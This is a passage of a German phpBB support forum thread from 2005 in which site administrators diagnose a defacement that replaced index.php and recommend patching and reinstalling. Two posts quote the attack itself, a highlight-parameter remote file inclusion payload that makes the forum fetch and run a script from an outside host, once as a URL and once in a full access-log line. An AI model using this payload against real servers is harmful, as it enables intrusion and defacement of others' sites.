Seite 2 von 3
Verfasst: 10.12.2005 23:23
von whyte
Hallo,
wenn tatsächlich bei einem Aufruf die index.php wieder durch eine neue ersetzt wird, dann gehe ich davon aus, dass in einer anderen Datei dies programmiert wurd.
Ich würde hingehe und mal in sämtlichen Verzeichnissen in den Dateien z.B. das Wort "FUCK" suche
so könnte man zumindest festestellen, wo das überhaupt herkommt.
UND: ich pflichte meinem Vorsprecher bei, ein update ist einfach nur Pflich!
Gruß
Marco
Verfasst: 10.12.2005 23:27
von Mihil
Mein CrackerTracker hat den Angriff abgefangen, dieses Skript wird dann ausgeführt:
http://www.yatas.com/phpbb_private.txt
Verfasst: 11.12.2005 00:52
von Dennis63
Wenn so ein Script auf dem Server ausgeführt wird, kann man sich ja auch kaum beschweren.
Fragt sich nur, wer das Script vorher hochgeladen hat. Ich glaube kaum, daß es durch ein unbekanntest Sicherheitsloch im phpBB 2.0.18 entstanden ist. Sowas würden die Leute viel geschickter ausnutzen.
Lösche alle Files auf dem FTP Server und installiere das phpBB2.0.18 neu. Danach spiele ein altes Backup der Datenbank wieder ein. - Fertig.
Grüße
Dennis
Verfasst: 11.12.2005 13:17
von Mihil
Das Skript geht auch nur mit älteren Versionen, oder? Der komplette Pfad lautete nämlich so:
t=71&highlight=%2527.$poster=include($_GET[m]).%2527&m=
http://www.yatas.com/phpbb_private.txt?&
Und das mit dem "highlight" wurde doch schon längst gefixt, oder?
Verfasst: 11.12.2005 13:33
von Valerie Raghnall
also ich hab grade gesehen, dass der gute crackertracker es bei mir einwandfrei abgefangen hat... so etwa 20 versuche in 10 minuten oder so
Verfasst: 11.12.2005 13:38
von Dennis63
Das ist eine Ausnutzung des Highlight-BUGs in alten (!!) phpBB Versionen.
Grüße
Dennis
Verfasst: 11.12.2005 13:48
von Diesel
Ganz klar, hier wurde schlampig oder garnicht gepatched. (Vielleicht der gravierende Fehler, nur die Datenbank immer geupdatet zu haben?!?)
Am besten wäre es die Datenbank zu retten und ein neues PhpBB 2.0.18 KOMPLETT aufzuspielen. Deine Files sind nicht vertrauenswürdig, da sie offenbar manipuliert sind, garnicht geupdatet und auf einem alten Stand sind, den du offensichtlich nicht kennst etc.
Ist das Beste so, im übrigen war hier eindeutig der Highlight-Exploit am werkeln. (siehe Dennis)
Ich habe selbst mehrere Angriffe dieser Art in meinem Forum gehabt und dieser spezielle Fall sollte NUR die Index.php im Normalfall angegriffen haben, aber bei der alten Forumversion ist natürlich nicht ausschließbar, dass sich noch weitere Würmer bedient haben.
Wie gesagt, komplett neu die Files des Forums uploaden und Mods wieder nachträglich einbauen ist eindeutig der schnellste und vorallem sicherste Weg.
Verfasst: 12.12.2005 08:15
von Compiler
Hallo Leute,
es war ein phpbb 2.0.11 von einem anderen User des Hosters. Also es lag nicht an mir.
Code: Alles auswählen
72.9.246.108 - - [10/Dec/2005:15:17:52 +0100] "GET /viewtopic.php?t=756&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 28381 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t Mist Aleks)"
Siehe auch hier.
MfG
Compiler
Verfasst: 12.12.2005 20:52
von Dennis63
Bei einem phpBB 2.0.11 ist es kein Wunder. Das Forum halt halt ein Sicherheitsloch.
Aber wenn es auf einem anderen Account war, dann würde ich mir ganz schnell einen neuen Hoster suchen. Wenn ein anderer Kunde auf Deine Daten zugriefen kann, dann kann er ja ganz einfach in das Admin-Menü Deines Forums kommen oder deine User mit Spam vollmüllen.
Darf ich fragen, bei welchem Hoster du bist?
Grüße
Dennis
Verfasst: 16.12.2005 23:40
von michi50
Das gleiche stand auf einmal bei meinem phpbb 2.2 testboard!
Da wurde auch die index.php überschrieben!